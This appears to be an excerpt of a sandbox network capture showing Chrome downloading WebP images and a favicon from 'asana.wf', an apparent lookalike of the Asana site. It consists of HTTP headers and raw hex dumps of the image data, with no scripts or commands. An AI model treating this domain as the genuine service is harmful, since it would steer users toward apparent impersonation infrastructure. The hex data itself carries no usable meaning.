                                                                                                                                                                                                                    2024-04-25 19:54:59 UTC8000INData Raw: 80 2f 5e b9 c4 e4 99 9a 26 47 e2 44 91 65 a3 b7 e2 82 2c 1c 7d 35 38 27 b0 13 32 12 69 cf e2 ae b9 19 68 74 9a ac 9c ac f1 ce 9c ea d1 8f f0 20 df 66 37 d5 b7 9b 6b 79 c7 01 9a b6 73 27 94 08 59 60 bc 4b 45 e9 68 53 e2 47 49 a9 54 26 cd be 47 a5 44 61 f0 ab 19 37 e1 b7 81 2d a0 2e 1a 7b b5 88 99 66 7d d6 3d 4f f2 39 ef 7b 6e d5 07 0e 10 ec 97 42 7b 03 3e d8 40 77 12 46 e0 dc 21 72 99 0b 5c 72 a4 5d 1a 27 03 9c 6d a5 f8 da f8 c5 c4 eb 0c 4e 57 3b 69 fe 4f b5 0b a0 b8 7e e8 a0 c7 e6 cd 0a b0 85 4f 4a ef 8b a1 42 f3 74 ff 7f 97 11 30 d8 c6 59 4c 36 ef fa 70 9e 6c 3a 82 a0 3d c4 d9 26 79 e5 da 1a 1f 62 f1 81 aa 8f 1d 4f 6a da 18 b5 bb 52 89 b9 a1 9c 27 c8 96 d1 4d 23 ec 2c 11 c8 53 a6 88 45 64 c8 a5 3e 06 12 9e 2f 82 7a b5 96 41 52 46 9d 09 06 4b ae 35 b8 8e
                                                                                                                                                                                                                    Data Ascii: /^&GDe,}58'2iht f7kys'Y`KEhSGIT&GDa7-.{f}=O9{nB{>@wF!r\r]'mNW;iO~OJBt0YL6pl:=&ybOjR'M#,SEd>/zARFK5
                                                                                                                                                                                                                    2024-04-25 19:54:59 UTC1258INData Raw: 4d a5 0c ac ed 99 58 7c 65 32 71 9c 6d 07 81 fa 85 d4 19 65 be 69 5b ad 3b ca c0 78 c5 f8 36 9f e2 bf 89 cd a2 6c 31 04 c9 a2 a5 07 2c 74 fa 5c ab 7e 94 27 ab 51 92 2e df 76 b1 83 d5 53 6b 7c 54 3f 70 20 ce 95 e2 dc 74 ce 27 55 07 ba 94 94 b1 68 2e b2 e9 55 5d 7b 35 16 48 88 3c bd 9b 4b 00 fe dc 8a 0a fd 75 18 a9 a3 01 f6 51 64 ec 68 d8 9a e8 85 99 d1 db a0 5c b8 b3 62 99 0f 0d 2e ed 5a 12 7b 75 f8 ad ac d9 40 7a 34 44 04 15 c4 59 19 29 86 4a 7a 4e ec e8 95 03 6c 5a 06 32 b5 91 fb 3a 03 0f 31 19 69 ed 60 18 98 27 d7 1f 9e e6 c7 28 f1 ef 74 36 41 cf 23 89 35 73 f6 b4 d6 2b 45 8e 0b 74 52 a9 1d 02 7c 10 85 c5 25 01 cd d7 cc 71 93 36 ae 24 24 32 c5 de 35 e6 20 05 c1 52 90 8f 9e 9f 2a 7d 72 cb 06 4e 19 da 0b 77 e2 9d 97 1c cc e7 e0 b5 f8 8f da 91 b5 bf 12 70
                                                                                                                                                                                                                    Data Ascii: MX|e2qmei[;x6l1,t\~'Q.vSk|T?p t'Uh.U]{5H<KuQdh\b.Z{u@z4DY)JzNlZ2:1i`'(t6A#5s+EtR|%q6$$25 R*}rNwp


                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                    46192.168.2.164975394.131.101.654432940C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                    2024-04-25 19:54:59 UTC367OUTGET /img/home24-resources-thumbnail.webp HTTP/1.1
                                                                                                                                                                                                                    Host: asana.wf
                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                    Sec-Fetch-Site: none
                                                                                                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                    2024-04-25 19:54:59 UTC226INHTTP/1.1 200 OK
                                                                                                                                                                                                                    Date: Thu, 25 Apr 2024 19:54:59 GMT
                                                                                                                                                                                                                    Server: Apache/2.4.52 (Ubuntu)
                                                                                                                                                                                                                    Last-Modified: Wed, 17 Apr 2024 18:44:03 GMT
                                                                                                                                                                                                                    ETag: "6786-6164f3d1507d1"
                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                    Content-Length: 26502
                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                    2024-04-25 19:54:59 UTC7966INData Raw: 52 49 46 46 7e 67 00 00 57 45 42 50 56 50 38 58 0a 00 00 00 10 00 00 00 2f 03 00 2f 03 00 41 4c 50 48 cb 01 00 00 01 90 55 db b6 dd 36 07 82 21 5c 28 42 92 04 41 24 06 0a 92 b4 08 2c 06 32 03 9b c9 15 83 73 fb cc 3b 5f e7 63 46 c4 04 c4 4b 4f f3 8f db 31 ca e1 71 db ee 5b bc e9 74 19 85 71 9b 5e d7 2e a3 38 9e db 2b e6 63 94 c7 be bc 68 1d 15 32 d7 17 ac a3 46 e6 fa 9f 79 54 c9 5c fe d1 8e 32 31 7a fb 6b 1b 85 72 8f 88 69 54 ca 9c 22 2e a5 62 ec d1 46 ad cc d3 43 b5 58 b6 62 31 9e 6f d5 e2 7a 54 8b 3e aa 65 f2 1f ff f1 1f ff f1 1f ff f1 1f ff f1 1f ff f1 1f ff f1 1f ff f1 1f ff f1 1f ff f1 1f ff f1 1f ff f1 1f ff f1 1f ff f1 1f ff f1 1f ff f1 1f ff f1 1f ff f1 1f ff f1 1f ff f1 1f ff f1 1f ff f1 1f ff f1 1f ff f1 1f ff f1 1f ff f1 1f ff f1 1f ff f1 1f ff
                                                                                                                                                                                                                    Data Ascii: RIFF~gWEBPVP8X//ALPHU6!\(BA$,2s;_cFKO1q[tq^.8+ch2FyT\21zkriT".bFCXb1ozT>e
                                                                                                                                                                                                                    2024-04-25 19:54:59 UTC8000INData Raw: 7e 71 3b ae 53 ff 92 d4 20 87 6d e9 9c e8 a6 f5 1b 5d fd e4 06 0c 8a 00 81 f3 d9 84 87 e4 2b cc e3 da 5d 4d 63 0e ee 25 97 73 0d 3d a9 70 e1 f5 e7 4f 70 ce ba 10 f1 f4 42 bf cc db a9 ba 68 a9 9d 01 ba 1c 12 22 73 63 52 69 cf 0a 3e 2c be 25 ce 38 4d 10 ac 97 00 f0 a6 83 96 f8 0d 6e 18 a7 46 86 b0 75 8d 45 bd ff 2a 29 b9 ed 25 79 44 72 7b 28 83 24 01 47 79 ed 82 89 30 e2 43 6a b7 35 47 54 bb c7 a1 de d4 f5 ca ce 7b d3 94 ac 4d b2 ba 96 bf eb 2c 9e b8 cb 7e a7 82 e3 a2 c7 a2 3c a1 30 da 9d 6d 1d 71 58 45 9b e9 00 12 36 c3 30 45 b6 8e 44 35 ce d6 a0 3d 74 44 cf 67 3e 74 71 16 80 7b 0a b6 21 96 0e 05 58 4b 96 05 9c ae a7 e6 ea 83 ee 3b 31 a6 70 8f 9e 3b 56 64 66 61 c8 49 bb f2 c2 a7 2e 35 08 5e 2e 01 7e e2 5b ac 4a ac 53 70 c2 4d d8 d9 95 7a 19 e4 aa 54 0f b1
                                                                                                                                                                                                                    Data Ascii: ~q;S m]+]Mc%s=pOpBh"scRi>,%8MnFuE*)%yDr{($Gy0Cj5GT{M,~<0mqXE60ED5=tDg>tq{!XK;1p;VdfaI.5^.~[JSpMzT
                                                                                                                                                                                                                    2024-04-25 19:54:59 UTC8000INData Raw: d8 b1 e2 39 2a ac a6 1f 1b 8b d5 44 b9 d0 3a 7a c4 9e d7 f2 76 68 87 2d 7d e0 ab 02 6f d3 f6 90 d8 30 d7 03 62 49 e9 84 fc d9 9b 8e fb 52 b0 e4 b8 fb d0 50 ef 4a 86 e6 f3 db 3a 7c 18 e7 0a 31 a3 18 be c2 83 90 65 85 da 4b 4d eb 9b 38 91 44 5a 27 83 72 ce a1 63 3f 8a 8c 76 41 4a 47 15 28 cc 51 24 be 64 ba bd ed c3 10 61 d9 68 91 3e 92 b6 c6 40 a4 8d 49 fa a5 d2 e1 df c6 34 2e fc 7a 21 53 3a ca 76 43 85 0d 54 fa e8 4d 7e db 4c e3 86 b0 7f 25 fe 83 58 63 bb 46 bc 13 95 7d e8 cb 5d d7 74 7f 5c 45 a8 c9 7c 57 a6 95 6c 96 53 82 a5 13 7b 84 77 d2 96 c9 88 38 e3 f8 02 05 c4 ca 4a 57 cc fe 04 09 87 88 34 73 83 98 a4 6d 7a dc e4 2e 87 9f 8f 78 1b 0f 47 13 d1 88 7f c8 ee b4 84 17 b7 9e f6 02 4f 09 88 d1 87 9b 2d d5 08 19 0c 73 ba ec a6 fe 5b 22 33 da eb 4a 12 f3 02
                                                                                                                                                                                                                    Data Ascii: 9*D:zvh-}o0bIRPJ:|1eKM8DZ'rc?vAJG(Q$dah>@I4.z!S:vCTM~L%XcF}]t\E|WlS{w8JW4smz.xGO-s["3J
                                                                                                                                                                                                                    2024-04-25 19:54:59 UTC2536INData Raw: 7b 8c 6b 31 db 98 4a 24 34 56 35 a1 a3 43 be 7b d2 2d ab 11 0e 20 1b b2 62 58 b9 38 b0 27 7e c4 02 4e b3 46 30 f3 b4 19 52 88 02 71 10 5e bc c9 f9 79 c4 b6 df f8 d4 44 83 d6 b3 35 8e c4 54 67 29 e6 e8 83 ed f7 32 83 1a 85 eb 28 d5 dd 4f 65 99 38 21 3f 4e 31 32 00 97 24 ba c4 23 7e ea b3 ed 5d a6 86 03 b2 d3 97 fb 93 2e ba 42 12 78 78 95 b4 6c 71 77 ca 76 df 08 cf 01 3e 16 68 7e 4f 47 d8 ac 2e 69 51 ea 5b 29 1c bd 70 ce 50 cf 9e 4e bd 42 17 d7 29 24 57 74 1a 8c 64 e1 11 fb a9 b6 ef 2f f1 c5 ad e6 94 5a 4a 9d 66 be 71 2d d6 21 54 61 27 97 87 e1 07 4f 1c 52 bb 83 6e 22 90 5f 19 93 9d be 45 79 59 d8 26 5d 79 d2 b7 33 ed 8f c9 62 14 8a c6 fd 50 39 f8 73 e3 b3 7a a7 fd 99 ef f2 c6 3e 72 d6 41 89 a5 ce ef bc 5f 10 86 d7 dc e8 eb 34 c4 87 4e 0d 9e 52 da 09 c3 71
                                                                                                                                                                                                                    Data Ascii: {k1J$4V5C{- bX8'~NF0Rq^yD5Tg)2(Oe8!?N12$#~].Bxxlqwv>h~OG.iQ[)pPNB)$Wtd/ZJfq-!Ta'ORn"_EyY&]y3bP9sz>rA_4NRq


                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                    47192.168.2.164975494.131.101.654432940C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                    2024-04-25 19:54:59 UTC367OUTGET /img/home24-templates-thumbnail.webp HTTP/1.1
                                                                                                                                                                                                                    Host: asana.wf
                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                    Sec-Fetch-Site: none
                                                                                                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                    2024-04-25 19:54:59 UTC226INHTTP/1.1 200 OK
                                                                                                                                                                                                                    Date: Thu, 25 Apr 2024 19:54:59 GMT
                                                                                                                                                                                                                    Server: Apache/2.4.52 (Ubuntu)
                                                                                                                                                                                                                    Last-Modified: Wed, 17 Apr 2024 18:44:03 GMT
                                                                                                                                                                                                                    ETag: "3dd6-6164f3d1507d1"
                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                    Content-Length: 15830
                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                    2024-04-25 19:54:59 UTC7966INData Raw: 52 49 46 46 ce 3d 00 00 57 45 42 50 56 50 38 58 0a 00 00 00 10 00 00 00 2f 03 00 2f 03 00 41 4c 50 48 af 01 00 00 01 80 15 49 92 ad 6a 24 20 61 a5 1c 29 38 60 1d 80 13 ae 83 c5 c1 91 70 a4 ac 04 de 87 fb df 1f 19 11 13 50 7b 0f fd ba cd 7b 1c ce 6d 1c 5b fd eb b2 de 83 71 2c bf b5 f5 1e 8e a3 fd 70 9a f7 78 9c 7d d7 f9 1e 91 e7 1d e7 7b 48 9e bf 9c ee 31 d9 3f b4 99 13 b3 bd 8d 7b 50 ae 55 b5 dc a3 72 a9 1a 59 b1 56 bb 87 e5 e1 98 16 7d a4 c5 75 4b 8b 6d a6 c5 bc f3 3f ff f3 3f ff f3 3f ff f3 3f ff f3 3f ff f3 3f ff f3 3f ff f3 3f ff f3 3f ff f3 3f ff f3 3f ff f3 3f ff f3 3f ff f3 3f ff f3 3f ff f3 3f ff f3 3f ff f3 3f ff f3 3f ff f3 3f ff f3 3f ff f3 3f ff f3 3f ff f3 3f ff f3 3f ff f3 3f ff f3 3f ff f3 3f ff f3 3f ff f3 3f ff f3 3f ff f3 3f ff f3 3f ff
                                                                                                                                                                                                                    Data Ascii: RIFF=WEBPVP8X//ALPHIj$ a)8`pP{{m[q,px}{H1?{PUrYV}uKm?????????????????????????????????
                                                                                                                                                                                                                    2024-04-25 19:54:59 UTC7864INData Raw: ec 07 24 3b 9d b3 f9 f1 a2 49 7a 0a cc 56 57 3a 8a 13 f5 be a2 4b cd 63 c7 4b 44 a3 2f a0 db 40 52 8e 8d e0 8b 71 dc cd 81 9e 7c 97 52 89 97 02 23 49 7e 04 db 1c 38 7e 67 c0 2b 95 c8 37 e0 ae 43 12 8e 3b da 66 31 3d 1e 77 27 63 62 f6 74 63 01 67 04 dd 32 e0 c3 82 b4 73 99 92 e8 c5 67 ea 67 96 4d 07 32 aa 8c 98 ca 17 8d fa 19 f5 7a d8 fa ae 3f b8 1e 35 81 ba a5 a2 ff 91 b4 98 4f fa 5d 41 94 43 21 2f 3a 51 93 71 e7 29 41 cf a2 75 b4 01 b3 d8 64 05 b4 40 bc 2a 79 03 ab 5b aa 8f 95 16 3d c5 a3 a7 7d fd 8f 2e a5 f1 2b 16 2a 70 94 b9 67 3b 52 6b 32 5e 00 66 d3 3c e2 29 6c 43 01 b3 cb 9d 75 de dd b4 10 07 59 7c cc 16 42 69 75 6d 80 04 8c d8 19 79 e6 b8 f0 e0 52 55 1d 3d 1b fe b1 7b ce c0 ce c8 13 e3 bf 99 8c e9 fe 91 40 83 ea cf 84 c6 15 c7 55 c4 c9 e3 d2 d3 91
                                                                                                                                                                                                                    Data Ascii: $;IzVW:KcKD/@Rq|R#I~8~g+7C;f1=w'cbtcg2sggM2z?5O]AC!/:Qq)Aud@*y[=}.+*pg;Rk2^f<)lCuY|BiumyRU={@U


                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                    48192.168.2.164975594.131.101.654432940C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                    2024-04-25 19:54:59 UTC373OUTGET /img/HOME24-web-hero-gartner-2x-en-US.webp HTTP/1.1
                                                                                                                                                                                                                    Host: asana.wf
                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                    Sec-Fetch-Site: none
                                                                                                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                    2024-04-25 19:54:59 UTC224INHTTP/1.1 200 OK
                                                                                                                                                                                                                    Date: Thu, 25 Apr 2024 19:54:59 GMT
                                                                                                                                                                                                                    Server: Apache/2.4.52 (Ubuntu)
                                                                                                                                                                                                                    Last-Modified: Wed, 17 Apr 2024 18:44:03 GMT
                                                                                                                                                                                                                    ETag: "d9c-6164f3d1507d1"
                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                    Content-Length: 3484
                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                    2024-04-25 19:54:59 UTC3484INData Raw: 52 49 46 46 94 0d 00 00 57 45 42 50 56 50 38 58 0a 00 00 00 10 00 00 00 2f 03 00 1f 02 00 41 4c 50 48 e8 00 00 00 01 67 60 20 92 cc a4 4f 60 1b d0 80 88 88 f2 db b9 0c 00 4e b5 6d cb 9b 27 cc b0 66 8b 00 14 80 12 62 83 a4 f0 c4 49 3b 75 42 01 9d 98 3e 57 51 f0 94 ee 88 fe 4f 80 a4 ea 55 30 e3 30 a6 f3 fe 57 b0 e3 75 4c 52 f9 3d 18 72 12 91 56 c1 92 15 e9 d5 13 53 b5 82 29 13 97 ae c8 3d b9 a2 f6 ea 8a c9 87 2b ae 03 fe c7 ff f8 1f ff e3 7f fc 8f ff f1 3f fe c7 ff f8 1f ff e3 7f fc 8f ff f1 3f fe c7 ff f8 1f ff e3 7f fc 8f ff f1 3f fe c7 ff f8 1f ff e3 7f fc 8f ff f1 3f fe c7 ff f8 1f ff e3 7f fc 8f ff f1 3f fe c7 ff f8 1f ff e3 7f fc 8f ff f1 3f fe c7 ff f8 1f ff ff 48 fd 74 c5 e1 cd 15 93 47 57 b4 ef 5d 91 1d b8 22 a6 77 4f 4c a4 95 27 2a 52 f9 cd 11 d3
                                                                                                                                                                                                                    Data Ascii: RIFFWEBPVP8X/ALPHg` O`Nm'fbI;uB>WQOU00WuLR=rVS)=+??????HtGW]"wOL'*R


                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                    49192.168.2.164975694.131.101.654432940C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                    2024-04-25 19:54:59 UTC375OUTGET /img/HOME24-web-hero-forrester-2x-en-US.webp HTTP/1.1
                                                                                                                                                                                                                    Host: asana.wf
                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                    Sec-Fetch-Site: none
                                                                                                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                    2024-04-25 19:54:59 UTC225INHTTP/1.1 200 OK
                                                                                                                                                                                                                    Date: Thu, 25 Apr 2024 19:54:59 GMT
                                                                                                                                                                                                                    Server: Apache/2.4.52 (Ubuntu)
                                                                                                                                                                                                                    Last-Modified: Wed, 17 Apr 2024 18:44:03 GMT
                                                                                                                                                                                                                    ETag: "1d3e-6164f3d1507d1"
                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                    Content-Length: 7486
                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                    2024-04-25 19:54:59 UTC7486INData Raw: 52 49 46 46 36 1d 00 00 57 45 42 50 56 50 38 58 0a 00 00 00 10 00 00 00 2f 03 00 1f 02 00 41 4c 50 48 17 01 00 00 01 67 60 90 6d e4 d8 1d c1 d7 e4 3e 22 22 f8 f5 3a 00 6a b5 6d cb 9b e7 04 17 48 ca f0 a9 76 87 b8 f8 b2 66 8f 96 54 97 60 ae 65 cf 0c df b7 d5 9f 7f 80 a7 74 47 f4 7f 02 94 6d 6e c6 64 c3 9b 95 9a f2 27 62 f2 e2 60 ce 78 b2 63 b9 45 f8 f2 c3 59 21 73 9a 0c d9 90 14 be 1c 71 56 90 8e 93 25 bb a4 57 4f 4c 2a 24 53 16 96 5d 51 79 74 45 f7 8b 2b 86 de 5d b1 fe e9 8a bd e8 8a 9b 84 ff f1 3f fe c7 ff f8 1f ff e3 7f fc 8f ff f1 3f fe c7 ff f8 1f ff e3 7f fc 8f ff f1 3f fe c7 ff f8 1f ff e3 7f fc 8f ff f1 3f fe c7 ff f8 1f ff e3 7f fc 8f ff f1 3f fe c7 ff f8 1f ff e3 7f fc 8f ff f1 3f fe c7 ff f8 1f ff e3 7f fc 8f ff f1 3f fe ff 09 1b 5d 71 f3 e9 8a
                                                                                                                                                                                                                    Data Ascii: RIFF6WEBPVP8X/ALPHg`m>"":jmHvfT`etGmnd'b`xcEY!sqV%WOL*$S]QytE+]???????]q


                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                    50192.168.2.164975794.131.101.654432940C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                    2024-04-25 19:54:59 UTC369OUTGET /img/HOME24-web-hero-IDC-2x-en-US.webp HTTP/1.1
                                                                                                                                                                                                                    Host: asana.wf
                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                    Sec-Fetch-Site: none
                                                                                                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                    2024-04-25 19:55:00 UTC224INHTTP/1.1 200 OK
                                                                                                                                                                                                                    Date: Thu, 25 Apr 2024 19:54:59 GMT
                                                                                                                                                                                                                    Server: Apache/2.4.52 (Ubuntu)
                                                                                                                                                                                                                    Last-Modified: Wed, 17 Apr 2024 18:44:03 GMT
                                                                                                                                                                                                                    ETag: "f0e-6164f3d1507d1"
                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                    Content-Length: 3854
                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                    2024-04-25 19:55:00 UTC3854INData Raw: 52 49 46 46 06 0f 00 00 57 45 42 50 56 50 38 58 0a 00 00 00 10 00 00 00 2f 03 00 1f 02 00 41 4c 50 48 17 01 00 00 01 67 60 90 6d e4 d8 1d c1 d7 e4 3e 22 22 f8 f5 3a 00 6a b5 6d cb 9b e7 04 17 48 ca f0 a9 76 87 b8 f8 b2 66 8f 96 54 97 60 ae 65 cf 0c df b7 d5 9f 7f 80 a7 74 47 f4 7f 02 94 6d 6e c6 64 c3 9b 95 9a f2 27 62 f2 e2 60 ce 78 b2 63 b9 45 f8 f2 c3 59 21 73 9a 0c d9 90 14 be 1c 71 56 90 8e 93 25 bb a4 57 4f 4c 2a 24 53 16 96 5d 51 79 74 45 f7 8b 2b 86 de 5d b1 fe e9 8a bd e8 8a 9b 84 ff f1 3f fe c7 ff f8 1f ff e3 7f fc 8f ff f1 3f fe c7 ff f8 1f ff e3 7f fc 8f ff f1 3f fe c7 ff f8 1f ff e3 7f fc 8f ff f1 3f fe c7 ff f8 1f ff e3 7f fc 8f ff f1 3f fe c7 ff f8 1f ff e3 7f fc 8f ff f1 3f fe c7 ff f8 1f ff e3 7f fc 8f ff f1 3f fe ff 09 1b 5d 71 f3 e9 8a
                                                                                                                                                                                                                    Data Ascii: RIFFWEBPVP8X/ALPHg`m>"":jmHvfT`etGmnd'b`xcEY!sqV%WOL*$S]QytE+]???????]q


                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                    51192.168.2.164975894.131.101.654432940C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                    2024-04-25 19:54:59 UTC600OUTGET /assets/img/brand/asana-logo-favicon.ico HTTP/1.1
                                                                                                                                                                                                                    Host: asana.wf
                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                    Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                    Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                    Sec-Fetch-Dest: image
                                                                                                                                                                                                                    Referer: https://asana.wf/
                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                    2024-04-25 19:55:00 UTC266INHTTP/1.1 200 OK
                                                                                                                                                                                                                    Date: Thu, 25 Apr 2024 19:54:59 GMT
                                                                                                                                                                                                                    Server: Apache/2.4.52 (Ubuntu)
                                                                                                                                                                                                                    Last-Modified: Wed, 17 Apr 2024 18:44:03 GMT
                                                                                                                                                                                                                    ETag: "a2be-6164f3d154651"
                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                    Content-Length: 41662
                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                    Content-Type: image/vnd.microsoft.icon
                                                                                                                                                                                                                    2024-04-25 19:55:00 UTC7926INData Raw: 00 00 01 00 01 00 64 64 00 00 01 00 20 00 a8 a2 00 00 16 00 00 00 28 00 00 00 64 00 00 00 c8 00 00 00 01 00 20 00 00 00 00 00 40 9c 00 00 23 2e 00 00 23 2e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                    Data Ascii: dd (d @#.#.
                                                                                                                                                                                                                    2024-04-25 19:55:00 UTC8000INData Raw: 6a 6a f0 ff 6a 6a f0 ff 6a 6a f0 ff 6a 6a f0 ff 6a 6a f0 ff 6a 6a f0 ff 6a 6a f0 ff 6a 6a f0 ff 6a 6a f0 ff 6a 6a f0 ff 6a 6a f0 ff 6a 6a f0 ff 6a 6a f0 ff 6a 6a f0 ff 6a 6a f0 ff 6a 6a f0 ff 6a 6a f0 ff 6a 6a f0 ff 6a 6a f0 ff 6a 6a f0 ff 6a 6a f0 e9 6c 6c eb 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 6a 6a f0 ba 6a 6a f0 ff 6a 6a f0 ff 6a 6a f0 ff 6a 6a f0 ff 6a 6a f0 ff 6a 6a f0 ff 6a 6a f0 ff 6a 6a f0 ff 6a 6a f0 ff 6a 6a f0 ff 6a 6a f0 ff 6a 6a f0 ff 6a 6a f0 ff 6a 6a f0 ff 6a 6a f0 ff 6a 6a f0 ff 6a 6a f0
                                                                                                                                                                                                                    Data Ascii: jjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjlljjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjj
